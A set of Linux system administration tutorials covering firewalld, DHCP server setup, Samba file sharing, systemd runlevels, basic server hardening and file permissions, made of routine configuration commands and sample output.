# iptables -A FORWARD -o eth0 -j ACCEPT

This way, Firewall gets access to the nodes of the LAN that have internal IP address. The packets enter through the eth2 device of the gateway. They are then routed from one LAN node to their intended destination nodes.

Dynamic Firewall

By default, the IPv4 policy in Fedora kernels disables support for IP forwarding. This prevents machines that run Fedora from functioning as a dedicated firewall. Furthermore, starting with Fedora 16, the default firewall solution is now provided by “firewalld”. Although it is claimed to be the default, Fedora 16 still ships with the traditional firewall iptables. To enable the dynamic firewall in Fedora, you will need to disable the traditional firewall and install the new dynamic firewalld. The main difference between the two is firewalld is smarter in the sense it does not have to be stopped and restarted each time a policy decision is changed, unlike the traditional firewall.

To disable the traditional firewall, there are two methods, graphical and command line. For the graphical method, the GUI for the System-Config- Firewall can be opened from the Applications menu > Other > Firewall. The firewall can now be disabled. 

For the command line, following commands will be needed:

# systemctl stop iptables.service
# systemctl stop ip6tables.service

To remove iptables entirely from system:

# systemctl disable iptables.service

rm '/etc/systemd/system/basic.target.wants/iptables.service'

# systemctl disable ip6tables.service

rm '/etc/systemd/system/basic.target.wants/ip6tables.service'

For installing Firewalld, you can use Yum:

# yum install firewalld firewall-applet

To enable and then start Firewalld you will need the following commands:

# systemctl enable firewalld.service
# systemctl start firewalld.service

The firewall-applet can be started from Applications menu > Other > Firewall Applet

When you hover the mouse over the firewall applet on the top panel, you can see the ports, services, etc. that are enabled. By clicking on the applet, the different services can be started or stopped. However, if you change the status and the applet crashes in order to regain control, you will have to kill the applet by using the following commands:

# ps -A | grep firewall*

Which will tell you the PID of the running applet, and you can kill it with the following command:

# kill -9 <pid>

A restart of the applet can be done from the Applications menu, and now the service you had enabled will be visible.

To get around this, the command line option can be used:

Use firewall-cmd to enable, for example ssh: 

# firewall-cmd --enable --service=ssh

Enable samba for 10 seconds: Enable samba for 10 seconds:

# firewall-cmd --enable --service=samba --timeout=10

Enable ipp-client:

# firewall-cmd --enable --service=ipp-client

Disable ipp-client:

# firewall-cmd --disable --service=ipp-client

To restore the static firewall with lokkit again simply use (after stopping and disabling Firewalld):

# lokkit --enabled

  • Hits: 33182

Installation and Configuration of Linux DHCP Server

For a cable modem or a DSL connection, the service provider dynamically assigns the IP address to your PC. When you install a DSL or a home cable router between your home network and your modem, your PC will get its IP address from the home router during boot up. A Linux system can be set up as a DHCP server and used in place of the router.

DHCP is not installed by default on your Linux system. It has to be installed by gaining root privileges:

$ su -

You will be prompted for the root password and you can install DHCP by the command:

# yum install dhcp

Once all the dependencies are satisfied, the installation will complete.

Start the DHCP Server

You will need root privileges for enabling, starting, stopping or restarting the dhcpd service:

# systemctl enable dhcpd.service

Once enabled, the dhcpd services can be started, stopped and restarted with:

# systemctl start dhcpd.service
# systemctl stop dhcpd.service
# systemctl restart dhcpd.service

or with the use of the following commands if systemctl command is not available:

# service dhcpd start
# service dhcpd stop
# service dhcpd restart

To determine whether dhcpd is running on your system, you can seek its status:

# systemctl status dhcpd.service

Another way of knowing if dhcpd is running is to use the 'service' command:

# service dhcpd status

Note that dhcpd has to be configured to start automatically on next reboot.

Configuring the Linux DHCP Server

Depending on the version of the Linux installation you are currently running, the configuration file may reside either in /etc/dhcpd or /etc/dhcpd3 directories.

When you install the DHCP package, a skeleton configuration file and a sample configuration file are created. Both are quite extensive, and the skeleton configuration file has most of its commands deactivated with # at the beginning. The sample configuration file can be found in the location /usr/share/doc/dhcp*/dhcpd.conf.sample.

When the dhcpd.conf file is created, a subnet section is generated for each of the interfaces present on your Linux system; this is very important. Following is a small part of the dhcp.conf file:

ddns-update-style interim

ignore client-updates

subnet 192.168.1.0 netmask 255.255.255.0 {

   # The range of IP addresses the server

   # will issue to DHCP enabled PC clients

   # booting up on the network

   range 192.168.1.201 192.168.1.220;

   # Set the amount of time in seconds that

   # a client may keep the IP address

  default-lease-time 86400;

  max-lease-time 86400;

   # Set the default gateway to be used by

   # the PC clients

   option routers 192.168.1.1;

   # Don't forward DHCP requests from this

   # NIC interface to any other NIC

   # interfaces

   option ip-forwarding off;

   # Set the broadcast address and subnet mask

   # to be used by the DHCP clients

  option broadcast-address 192.168.1.255;

  option subnet-mask 255.255.255.0;

   # Set the NTP server to be used by the

   # DHCP clients

  option ntp-servers 192.168.1.100;

   # Set the DNS server to be used by the

   # DHCP clients

  option domain-name-servers 192.168.1.100;

   # If you specify a WINS server for your Windows clients,

   # you need to include the following option in the dhcpd.conf file:

  option netbios-name-servers 192.168.1.100;

   # You can also assign specific IP addresses based on the clients'

   # ethernet MAC address as follows (Host's name is "laser-printer":

  host laser-printer {

      hardware ethernet 08:00:2b:4c:59:23;

     fixed-address 192.168.1.222;

   }

}

#

# List an unused interface here

#

subnet 192.168.2.0 netmask 255.255.255.0 {

}

The IP addresses will need to be changed to meet the ranges suitable to your network. There are other option statements that can be used to configure the DHCP. As you can see, some of the resources such as printers, which need fixed IP addresses, are given the specific IP address based on the NIC MAC address of the device.

For more information, you may read the relevant man pages:

# man dhcp-options

Routing with a DHCP Server

When a PC with DHCP configuration boots, it requests for the IP address from the DHCP server. For this, it sends a standard DHCP request packet to the DHCP server with a source IP address of 255.255.255.255. A route has to be added to this 255.255.255.255 address so that the DHCP server knows on which interface it has to send the reply. This is done by adding the route information to the /etc/sysconfig/network-scripts/route-eth0 file, assuming the route is to be added to the eth0 interface:

#
# File /etc/sysconfig/network-scripts/route-eth0
#
255.255.255.255/32 dev eth0

After defining the interface for the DHCP routing, it has to be further ensured that your DHCP server listens only to that interface and to no other. For this the /etc/sysconfig/dhcpd file has to be edited and the preferred interface added to the DHCPDARGS variable. If the interface is to be eth0 following are the changes that need to be made:

# File: /etc/sysconfig/dhcpd

DHCPDARGS=eth0

Testing the DHCP

Using the netstat command along with the -au option will show the list of interfaces listening on the bootp or DHCP UDP port:

# netstat -au  | grep bootp

will result in the following:

udp     0         0 192.168.1.100:bootps         *:*

Additionally, a check on the /var/log/messages file will show the defined interfaces used from the time the dhcpd daemon was started:

Feb  24 17:22:44 Linux-64 dhcpd: Listening on LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24
Feb  24 17:22:44 Linux-64 dhcpd: Sending on  LPF/eth0/00:e0:18:5c:d8:41/192.168.1.0/24

This confirms the DHCP Service has been installed with success and operating correctly.

  • Hits: 74003

Configuring Linux Samba (SMB) - How to Setup Samba (Linux Windows File Sharing)

Resource sharing, like file systems and printers, in Microsoft Windows systems, is accomplished using a protocol called the Server Message Block or SMB. For working with such shared resources over a network consisting of Windows systems, an RHEL system must support SMB. The technology used for this is called SAMBA. This provides integration between the Windows and Linux systems. In addition, this is used to provide folder sharing between Linux systems. There are two parts to SAMBA, a Samba Server and a Samba Client.

When an RHEL system accesses resources on a Windows system, it does so using the Samba Client. An RHEL system, by default, has the Samba Client installed.

When an RHEL system serves resources to a Windows system, it uses the package Samba Server or simply Samba. This is not installed by default and has to be exclusively set up.

Installing SAMBA on Linux Redhat/CentOS

Whether Samba is already installed on your RHEL, Fedora or CentOS setup, it can be tested with the following command:"

$ rpm -q samba

The result could be - “package samba is not installed,” or something like “samba-3.5.4-68.el6_0.1.x86_64” showing the version of Samba present on the system.

To install Samba, you will need to become root with the following command (give the root password, when prompted):

$ su -       

Then use Yum to install the Linux Samba package:

# yum install samba

This will install the samba package and its dependency package, samba-common.

Before you begin to use or configure Samba, the Linux Firewall (iptables) has to be configured to allow Samba traffic. From the command-line, this is achieved with the use of the following command:

# firewall-cmd --enable --service=samba

Configuring Linux SAMBA

The Samba configuration is meant to join an RHEL, Fedora or CentOS system to a Windows Workgroup and setting up a directory on the RHEL system, to act as a shared resource that can be accessed by authenticated Windows users.

To start with, you must gain root privileges with (give the root password, when prompted):

$ su -     

Edit the Samba configuration file:

# vi /etc/samba/smb.conf

The smb.conf [Global] Section

An smb.conf file is divided into several sections. the [global] section, which is the first section, has settings that apply to the entire Samba configuration. However, settings in the other sections in the configuration file may override the global settings.

To begin with, set the workgroup, which by default is set as “MYGROUP”:

workgroup = MYGROUP

Since most Windows networks are named WORKGROUP by default, the settings have to be changed as:

workgroup = workgroup

Configure the Shared Resource

In the next step, a shared resource that will be accessible from the other systems on the Windows network has to be configured. This section has to be given a name by which it will be referred to when shared. For our example, let’s assume you would like share a directory on your Linux system located at /data/network-applications.  You’ll need to entitle the entire section as [NetApps] as shown below in our smb.conf file:

[NetApps]       

path = /data/network-applications

writeable = yes

browseable = yes

valid users = administrator

 When a Windows user browses to the Linux Server, they’ll see a network share labeled

NetApps”.

This concludes the changes to the Samba configuration file.

Create a Samba User

Any user wanting to access any Samba shared resource must be configured as a Samba User and assigned a password. This is achieved using the smbpasswd  command as a root user. Since you have defined “administrator” as the user who is entitled to access the “/data/network-applications” directory of the RHEL system, you have to add “administrator” as a Samba user.

You must gain root privileges with the following command (give the root password, when prompted):

$ su -

Add “administrator” as a Windows user -

# smbpasswd -a administrator

The system will respond with

New SMB password: <Enter password>
Retype new SMB password: <Retype password>

This will result into the following message:

Added user administrator

It will also be necessary to add the same account as a simple linux user, using the same password we used for the samba user:

# adduser administrator
# passwd administrator
Changing password for user administrator
New UNIX password: ********
Retype new UNIX password: ********
passwd: all authentication tokens updated successfully.
Now it is time to test the samba configuration file for any errors. For this you can use the command line tool “testparm” as root:
# testparm
Load smb config files from /etc/samba/smb.conf

Rlimit_max: rlimit_max (1024) below minimum Windows limit (16384)

Processing section “[NetApps]”

Loaded services file OK.

Server role: ROLE_STANDALONE

Press enter to see a dump of your service definitions

If you would like to ensure that Windows users are automatically authenticated to your Samba share, without prompting for a username/password, all that’s needed is to add the samba user and password exactly as you Windows clients usernames and password. When a Windows system accesses a Samba share, it will automatically try to log in using the same credentials as the user logged into the Windows system.

Starting Samba and NetBios Name Service on RHEL

The Samba and NetBios Nameservice or NMB services have to be enabled and then started for them to take effect:

# systemctl enable smb.service
# systemctl start smb.service
# systemctl enable nmb.service
# systemctl start nmb.service

In case the services were already running, you may have to restart them again:

# systemctl restart smb.service
# systemctl restart nmb.service

If you are not using systemctl command, you can alternatively start the Samba using a more classic way:

[root@gateway] service smb start
Starting SMB services:  [OK]

To configure your Linux system to automatically start the Samba service upon boot up, the above command will need to be inserted in the /etc/rc.local file. For more information about this, you can read our popular Linux Init Process & Different run levels article

Accessing the Samba Shares From Windows                               

Now that you have configured the Samba resources and the services are running, they can be tested for sharing from a Windows system. For this, open the Windows Explorer and navigate to the Network page. Windows should show the RHEL system. If you double-click on the RHEL icon, you will be prompted for the username and password. The username to be entered now is “administrator” with the password that was assigned. 

Again, if you are logged on your Windows workstation using the same account and password as that of the Samba service (e.g Administrator), you will not be prompted for any authentication as the Windows  operating system will automatically authenticate to the RHEL Samba service using these credentials.

Accessing Windows Shares From RHEL Workstation or Server

To access Windows shares from your RHEL system, the package samba-client may have to be installed, unless it is installed by default. For this you must gain root privileges with (give the root password, when prompted):

$ su -  

Install samba-client using the following commands:

# yum install samba-client

To see any shared resource on the Windows system and to access it, you can go to Places > Network. Clicking on the Windows Network icon will open up the list of workgroups available for access.

  • Hits: 332470

Understanding The Linux Init Process & Different RunLevels

Different Linux systems can be used in many ways. This is the main idea behind operating different services at different operating levels. For example, the Graphical User Interface can only be run if the system is running the X-server; multiuser operation is only possible if the system is in a multiuser state or mode, such as having networking available. These are the higher states of the system, and sometimes you may want to operate at a lower level, say, in the single user mode or the command line mode.

Such levels are important for different operations, such as for fixing file or disk corruption problems, or for the server to operate in a run level where the X-session is not required. In such cases having services running that depend on higher levels of operation, makes no sense, since they will hamper the operation of the entire system.

Each service is assigned to start whenever its run level is reached. Therefore, when you ensure the startup process is orderly, and you change the mode of the machine, you do not need to bother about which service to manually start or stop.

The main run-levels that a system could use are:

RunLevel

Target

Notes

0

runlevel0.target, poweroff.target

Halt the system

1

runlevel1.target,  rescue.target

Single user mode

2, 4

runlevel2.target, runlevel4.target, multi-user.target

User-defined/Site-specific runlevels. By default, identical to 3

3

runlevel3.target,multi-user.target

Multi-user, non-graphical. Users can usually login via multiple consoles or via the network.

5

runlevel5.target, graphical.target

Multi-user, graphical. Usually has all the services of runlevel3 plus a graphical login - X11

6

runlevel6.target, reboot.target

Reboot

Emergency

emergency.target

Emergency shell

The system and service manager for Linux is now “systemd”. It provides a concept of “targets”, as in the table above. Although targets serve a similar purpose as runlevels, they act somewhat differently. Each target has a name instead of a number and serves a specific purpose. Some targets may be implemented after inheriting all the services of another target and adding more services to it.

Backward compatibility exists, so switching targets using familiar telinit RUNLEVEL command still works. On Fedora installs, runlevels 0, 1, 3, 5 and 6 have an exact mapping with specific systemd targets. However, user-defined runlevels such as 2 and 4 are not mapped that way. They are treated similar to runlevel 3, by default.

For using the user-defined levels 2 and 4, new systemd targets have to be defined that makes use of one of the existing runlevels as a base. Services that you want to enable have to be symlinked into that directory.

The most commonly used runlevels in a currently running linux box are 3 and 5. You can change runlevels in many ways.

A runlevel of 5 will take you to GUI enabled login prompt interface and desktop operations. Normally by default installation, this would take your to GNOME or KDE linux environment. A runlevel of 3 would boot your linux box to terminal mode (non-X) linux box and drop you to a terminal login prompt. Runlevels 0 and 6 are runlevels for halting or rebooting your linux respectively.

Although compatible with SysV and LSB init scripts, systemd:

  • Provides aggressive parallelization capabilities.
  • Offers on-demand starting of daemons.
  • Uses socket and D-Bus activation for starting services.
  • Keeps track of processes using Linux cgroups.
  • Maintains mount and automount points.
  • Supports snapshotting and restoring of the system state.
  • Implements an elaborate transactional dependency-based service control logic.

Systemd starts up and supervises the entire operation of the system. It is based on the notion of units. These are composed of a name, and a type as shown in the table above. There is a matching configuration file with the same name and type. For example, a unit avahi.service will have a configuration file with an identical name, and will be a unit that encapsulates the Avahi daemon. There are seven different types of units, namely, service, socket, device, mount, automount, target, and snapshot.

To introspect and or control the state of the system and service manager under systemd, the main tool or command is “systemctl”. When booting up, systemd activates the default.target. The job of the default.target is to activate the different services and other units by considering their dependencies. The ‘system.unit=’ command line option parses arguments to the kernel to override the unit to be activated. For example,

systemd.unit=rescue.target is a special target unit for setting up the base system and a rescue shell (similar to run level 1);

systemd.unit=emergency.target, is very similar to passing init=/bin/sh but with the option to boot the full system from there;

systemd.unit=multi-user.target for setting up a non-graphical multi-user system;

systemd.unit=graphical.target for setting up a graphical login screen.

How to Enable/Disable Linux Services

Following are the commands used to enable or disable services in CentOS, Redhat Enterprise Linux and Fedora systems:

Activate a service immediately e.g postfix:

[root@gateway ~]# service postfix start
Starting postfix: [  OK  ]

To deactivate a service immediately e.g postfix:

[root@gateway ~]# service postfix stop
Shutting down postfix: [  OK  ]

To restart a service immediately e.g postfix:

[root@gateway ~]# service postfix restart
Shutting down postfix: [FAILED]
Starting postfix: [  OK  ]

You might have noticed the 'FAILED' message. This is normal behavior as we shut down the postfix service with our first command (service postfix stop), so shutting it down a second time would naturally fail!

Determine Which Linux Services are Enabled at Boot

The first column of this output is the name of a service which is currently enabled at boot. Review each listed service to determine whether it can be disabled.

 If it is appropriate to disable a service , do so using the command:

[root@gateway ~]# chkconfig -level servicename off

Run the following command to obtain a list of all services programmed to run in the different Run Levels of your system:

[root@gateway ~]#  chkconfig --list | grep :on

NetworkManager  0:off   1:off   2:on    3:on    4:on    5:on    6:off
abrtd           0:off   1:off   2:off   3:on    4:off   5:on    6:off
acpid           0:off   1:off   2:on    3:on    4:on    5:on    6:off
atd             0:off   1:off   2:off   3:on    4:on    5:on    6:off
auditd          0:off   1:off   2:on    3:on    4:on    5:on    6:off
autofs          0:off   1:off   2:off   3:on    4:on    5:on    6:off
avahi-daemon    0:off   1:off   2:off   3:on    4:on    5:on    6:off
cpuspeed        0:off   1:on    2:on    3:on    4:on    5:on    6:off
crond           0:off   1:off   2:on    3:on    4:on    5:on    6:off
cups            0:off   1:off   2:on    3:on    4:on    5:on    6:off
haldaemon       0:off   1:off   2:off   3:on    4:on    5:on    6:off
httpd           0:off   1:off   2:off   3:on    4:off   5:off   6:off
ip6tables       0:off   1:off   2:on    3:on    4:on    5:on    6:off
iptables        0:off   1:off   2:on    3:on    4:on    5:on    6:off
irqbalance      0:off   1:off   2:off   3:on    4:on    5:on    6:off

Several of these services are required, but several others might not serve any purpose in your environment, and use CPU and memory resources that would be better allocated to applications. Assuming you don't RPC services, autofs or NFS, they can be disabled for all Run Levels using the following commands:

[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 nfslock off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 netfs off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 rpcgssd off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 rpcidmapd off
[root@gateway ~]# /sbin/chkconfig –level 0123456 portmap off
[root@gateway ~]# /sbin/chkconfig –level 0123456 autofs off

How to Change Runlevels

You can switch to runlevel 3 by running:    

[root@gateway ~]# systemctl isolate multi-user.target

(or)

[root@gateway ~]# systemctl isolate runlevel3.target

You can switch to runlevel 5 by running:    

[root@gateway ~]# systemctl isolate graphical.target

(or)

[root@gateway ~]# systemctl isolate runlevel5.target

How to Change the Default Runlevel Using Systemd

The systemd uses symlinks to point to the default runlevel. You have to delete the existing symlink first, before you can create a new one:
 
[root@gateway ~]# rm /etc/systemd/system/default.target

Switch to runlevel 3 by default:

[root@gateway ~]# ln -sf /lib/systemd/system/multi-user.target /etc/systemd/system/default.target  Switch to runlevel 5 by default:    

[root@gateway ~]# ln -sf /lib/systemd/system/graphical.target /etc/systemd/system/default.target

 And just in case you were wondering, systemd does not use the classic /etc/inittab file!

How to Change The Default Runlevel Using The Inittab File

There's the Systemd way and of course, the Inittab way. In this case, Runlevels are represented by /etc/inittab text file. The default runlevel is always specified from /etc/inittab text file.

To change the default runlevel in fedora ,edit /etc/inittab and find the line that looks like this:  id:5:initdefault:

The number 5 represents a runlevel with X enabled (GNOME/KDE mostly). If you want to change to runlevel 3, simply change this

id:5:initdefault:to this

id:3:initdefault:Save and reboot your linux box. Your linux box would now reboot on runlevel 3, a runlevel without X or GUI. Avoid changing the default /etc/iniittab runlevel value to 0 or 6 .

Users having difficulty with Linux editors can also read our article on how to use Vi, the popular Linux editor: Linux VIM / Vi Editor - Tutorial - Basic & Advanced Features.

RunLevel    Target    Notes
0    runlevel0.target, poweroff.target     Halt the system.
1, s, single    runlevel1.target, rescue.target     Single user mode.
2, 4    runlevel2.target, runlevel4.target, multi-user.target    User-defined/Site-specific runlevels. By default, identical to 3.
3    runlevel3.target, multi-user.target     Multi-user, non-graphical. Users can usually login via multiple consoles or via the network.
5    runlevel5.target, graphical.target     Multi-user, graphical. Usually has all the services of runlevel 3 plus a graphical login.
6    runlevel6.target, reboot.target     Reboot
Emergency    emergency.target     Emergency shell
  • Hits: 62416

How To Secure Your Linux Server or Workstation - Linux Best Security Practices

Below are some of the most common recommendations and method to effectively secure a Linux Server or Workstation.

Boot Disk

One of the foremost requisites of a secure Linux server is the boot disk. Nowadays, this has become rather simple as most Linux distributions are on bootable CD/DVD/USB sticks. Other options are, to use rescue disks such as the ‘TestDisk’, ‘SystemRescueCD’, ‘Trinity Rescue Kit’ or ‘Ubuntu Rescue Remix’. These will enable you to gain access to your system, if you are unable to gain entry, and also to recover files and partitions if your system is damaged. They can be used to check for virus attacks and to detect rootkits.

Next requirement is for patching your system. Distributions issue notices for security updates, and you can download and patch your system using these updates. RPM users can use the ‘up2date’ command, which automatically resolves dependencies, rather than the other rpm commands, since these only report dependencies and do not help to resolve them.

Patch Your System

While RedHat/CentOS/Fedora users can patch their systems with a single command, 'yum update',   Debian users can patch their systems with the ‘sudo apt-get update’ command, which will update the sources list. This should be followed by the command ‘sudo apt-get upgrade’, which will install the newest version of all packages on the machine, resolving all the dependencies automatically.

New vulnerabilities are being discovered all the time, and patches follow. One way to learn about new vulnerabilities is to subscribe to the mailing list of the distribution used.

Disable Unnecessary Services

Your system becomes increasingly insecure as you operate more services, since every service has its own security issues. For improving the overall system performance and for enhancing security, it is important to detect and eliminate unnecessary running services. To know which services are currently running on your system, you can use commands like:

[root@gateway~]# ps aux            


Following is an example output of the above command:

[root@gateway~]# ps aux
USER       PID   %CPU   %MEM    VSZ    RSS  TTY  STAT START   TIME COMMAND
root         1   0.0    0.1   2828    1400  ?     Ss   Feb08   0:02 /sbin/init
root         2   0.0    0.0      0       0  ?     S    Feb08   0:00 [kthreadd]
root         3   0.0    0.0      0       0  ?     S    Feb08   0:00 [migration/0]
root         4   0.0    0.0      0       0  ?     S    Feb08   0:00 [ksoftirqd/0]
root         5   0.0    0.0      0       0  ?     S    Feb08   0:00 [watchdog/0]
root         6   0.0    0.0      0       0  ?     S    Feb08   0:00 [events/0]
root         7   0.0    0.0      0       0  ?     S    Feb08   0:00 [cpuset]
root         8   0.0    0.0      0       0  ?     S    Feb08   0:00 [khelper]
root         9   0.0    0.0      0       0  ?     S    Feb08   0:00 [netns]
root        10   0.0    0.0      0       0  ?     S    Feb08   0:00 [async/mgr]
root        11   0.0    0.0      0       0  ?     S    Feb08   0:00 [pm]
root        12   0.0    0.0      0       0  ?     S    Feb08   0:00 [sync_supers]
apache   17250   0.0    0.9  37036    10224 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   25686   0.0    0.9  37168    10244 ?     S    Feb08   0:00 /usr/sbin/httpd
apache   28290   0.0    0.9  37168    10296 ?     S    Feb08   0:00 /usr/sbin/httpd
postfix   30051  0.0    0.2  10240     2136 ?     S    23:35   0:00 pickup -l -t fifo -u
postfix   30060  0.0    0.2  10308     2280 ?     S    23:35   0:00 qmgr -l -t fifo -u
root      31645  0.1    0.3  11120     3112 ?     Ss   23:45   0:00 sshd: root@pts/1


The following command will list all start-up scripts for RunLevel 3 (Full multiuser mode):

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*     
OR
[root@gateway~]# ls -l /etc/rc3.d/S*          

Here is an example output of the above commands:

[root@gateway~]# ls -l /etc/rc.d/rc3.d/S*
lrwxrwxrwx. 1 root root 23 Jan 16 17:45 /etc/rc.d/rc3.d/S00microcode_ctl -> ../init.d/microcode_ctl
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S01sysstat -> ../init.d/sysstat
lrwxrwxrwx. 1 root root 22 Jan 16 17:44 /etc/rc.d/rc3.d/S02lvm2-monitor -> ../init.d/lvm2-monitor
lrwxrwxrwx. 1 root root 19 Jan 16 17:39 /etc/rc.d/rc3.d/S08ip6tables -> ../init.d/ip6tables
lrwxrwxrwx. 1 root root 18 Jan 16 17:38 /etc/rc.d/rc3.d/S08iptables -> ../init.d/iptables
lrwxrwxrwx. 1 root root 17 Jan 16 17:42 /etc/rc.d/rc3.d/S10network -> ../init.d/network
lrwxrwxrwx. 1 root root 16 Jan 27 01:04 /etc/rc.d/rc3.d/S11auditd -> ../init.d/auditd
lrwxrwxrwx. 1 root root 21 Jan 16 17:39 /etc/rc.d/rc3.d/S11portreserve -> ../init.d/portreserve
lrwxrwxrwx. 1 root root 17 Jan 16 17:44 /etc/rc.d/rc3.d/S12rsyslog -> ../init.d/rsyslog
lrwxrwxrwx. 1 root root 18 Jan 16 17:45 /etc/rc.d/rc3.d/S13cpuspeed -> ../init.d/cpuspeed
lrwxrwxrwx. 1 root root 20 Jan 16 17:40 /etc/rc.d/rc3.d/S13irqbalance -> ../init.d/irqbalance
lrwxrwxrwx. 1 root root 17 Jan 16 17:38 /etc/rc.d/rc3.d/S13rpcbind -> ../init.d/rpcbind
lrwxrwxrwx. 1 root root 19 Jan 16 17:43 /etc/rc.d/rc3.d/S15mdmonitor -> ../init.d/mdmonitor
lrwxrwxrwx. 1 root root 20 Jan 16 17:38 /etc/rc.d/rc3.d/S22messagebus -> ../init.d/messagebus


To disable services, you can either stop a running service or change the configuration in a way that the service will not start on the next reboot. To stop a running service, RedHat/CentOS users can use the command -

 [root@gateway~]# service service-name stop The example below shows the command used to stop our Apache web service (httpd):
[root@gateway~]# service httpd stop
Stopping httpd: [  OK  ]

In order to stop the service from starting up at boot time, you could use -

  [root@gateway~]# /sbin/chkconfig --levels 2345 service-name off  Where 'service-name' is replaced by the name of the service. e.g httpd    

You can also remove a service from the startup script by using the following commands which will remove the httpd (Apache Web server) service:

[root@gateway~]# /bin/mv /etc/rc.d/rc3.d/S85httpd /etc/rc.d/rc3.d/K85httpd 

or

[root@gateway~]# /bin/mv /etc/rc3.d/S85httpd /etc/rc3.d/K85httpd

During startup on of the Linux operating system, the rc program looks in the /etc/rc.d/rc3.d directory (when configured with Runlevel 3),  executing any K* scripts with an option of stop. Then, all the S* scripts are started with an option of start. Scripts are started in numerical order—thus, the S08iptables script is started before the S85httpd script. This allows you to choose exactly when your script starts without having to edit files. The same rule applies with the K* scripts.

In some rare cases, services may have to be removed from /etc/xinetd.d or /etc/inetd.conf file.

Debian users can use the following commands to stop, start and restart a service -

$ sudo service httpd stop
$ sudo service httpd start   
$ sudo service httpd restart       

Remove the startup script by using the following commands:

[root@gateway~]# /bin/mv /etc/rc.d/rc3.d/S85httpd /etc/rc.d/rc3.d/K85httpd

or

[root@gateway~]# /bin/mv /etc/rc3.d/S85httpd /etc/rc3.d/K85httpd

Host-based Firewall Protection with IPtables

Using iptables firewall, you could limit access to your server by IP address or by host/domain name. RedHat/CentOS users have a file /etc/sysconfig/iptables based on the services that were ‘allowed’ during installation. The file can be edited to accept some services and block others. In case the requested service does not match any of the ACCEPT lines in the iptables file, the packet is logged and then rejected.

RedHat/CentOS/Fedora users will have to install the iptables with:

[root@gateway~]# yum install iptables

Debian users will need to install the iptables with the help of:

$ sudo apt-get install iptables

Then use the iptables command line options/switches to implement the policy. The rules of iptables usually take the form:   
•    INIVIDUAL REJECTS FIRST
•    THEN OPEN IT UP
•    BLOCK ALL

As it is a table of rules, the first rule takes precedence. If the first rule dis-allows everything nothing else following later will matter.

In practice, a firewall script is needed which is created using the following sequence:
1) Create your script
2) Make it executable
3) Run the script

Following are the commands used for the above order:

[root@gateway~]# vim /root/firewall.sh   
[root@gateway~]# chmod 755 /root/firewall.sh   
[root@gateway~]# /root/firewall.sh             

Updating the firewall script is simply a matter of re-editing to make the necessary changes and running it again. Since iptables does not run as a daemon, instead of stopping, the rules are only flushed with the '-F' option: 

[root@gateway~]# iptables -F INPUT
[root@gateway~]# iptables -F OUTPUT
[root@gateway~]# iptables -F FORWARD
[root@gateway~]# iptables -F POSTROUTING -t nat
[root@gateway~]# iptables -F PREROUTING -t nat

At startup/reboot, all that is needed is to execute the script to flush the iptables rules. The simplest way to do this is to add the script (/root/firewall.sh) to the file /etc/rc.local file.

Best Practices

Apart from the above, a number of steps need to be taken to keep your Linux server safe from outside attackers. Key files should be checked for security and must be set to root for both owner and group:

/etc/fstab
/etc/passwd
/etc/shadow
/etc/group

The above should be owned by root and and their permission must be 644 (rw-r--r--), except /etc/shadow which should have the permission of 400 (r--------).

You can read more on how to set permissions on your Linux files in our Linux File & Folder Permissions article

Limiting Root Access

Implement a password policy, which forces users to change their login passwords, for example, every 60 to 90 days, starts warning them within 7 days of expiry, and accepts passwords that are a minimum of 14 characters in length.

Root access must be limited by using the following commands for RedHat/CentOS/Fedora -

[chris@gateway~]$ su -
Password: <enter root password>
[root@gateway ~]#

Or for RedHat/CentOS/Fedora/Debian:

[chris@gateway~]$ sudo -i
Password: <enter root password>
[root@gateway ~]#

Provide the password of the user, who can assume root privileges.

Only root should be able to access CRON. Cron is a system daemon used to execute desired tasks (in the background) at designated times.

A crontab is a simple text file with a list of commands meant to be run at specified times. It is edited with a command-line utility. These commands (and their run times) are then controlled by the cron daemon, which executes them in the system background. Each user has a crontab file which specifies the actions and times at which they should be executed, these jobs will run regardless of whether the user is actually logged into the system. There is also a root crontab for tasks requiring administrative privileges. This system crontab allows scheduling of systemwide tasks (such as log rotations and system database updates). You can use the man crontab command to find more information about it.

Lastly, the use of SSH is recommended instead of Telnet for remote accesses. The main difference between the two is that SSH encrypts all data exchanged between the user and server, while telnet sends all data in clear-text, making it extremely easy to obtain root passwords and other sensitive information. All unused TCP/UDP ports must also be blocked using IPtables.

  • Hits: 29328

Understanding, Administering Linux Groups and User Accounts

In a multi-user environment like Linux, every file is owned by a user and a group. There can be others as well who may be allowed to work with the file. What this means is, as a user, you have all the rights to read, write and execute a file created by you. Now, you may belong to a group, so you can give your group members the permission to either read, write (modify) and/or execute your file. In the same way, for those who do not belong to your group, and are called 'others', you may give similar permissions.

How are these permissions shown and how are they modified?

In a shell, command line or within a terminal, if you type 'ls -l', you will see something like the following:

drwxr-x--- 3 tutor firewall  4096 2010-08-21 15:52 Videos
-rwxr-xr-x 1 tutor firewall    21 2010-05-10 10:02 Doom-TNT

The last group of words on the right is the name of the file or directory. Therefore, 'Videos' is a directory, which is designated by the ’d’ at the start of the line. Since 'Doom-TNT' shows only a '-', at the start of the line, it is a file. The following series of 'rwx...' are the permissions of the file or directory. You will notice that there are three sets of 'rwx'. The first three rwx are the read, write and execute permissions for the owner 'tutor'.

Since the r, w and x are present, it means the owner has all the permissions. The next set of 'rwx' is permissions for the group, which is the second 'username'. You will notice that the 'w' here is missing, and is replaced by a '-'. This means group members of the group 'username' have permissions to read and to execute 'Doom-TNT', but cannot write to it or modify it. Permission for 'others' is the same. Therefore, others can also read and execute the file, but not write to it or modify it. Others do not have any permissions for the directory 'Videos' and hence cannot read (enter), modify or execute 'Videos'.

You can use the 'chmod' command to change the permissions you give. The basic form of the command looks like:

chmod 'who'+/-'permissions' 'filename'

Here, the 'filename' is the file, whose permissions are being modified. You are giving the permissions to 'who', and 'who' can be u=user (meaning you), g=group, o=others, or a=all.

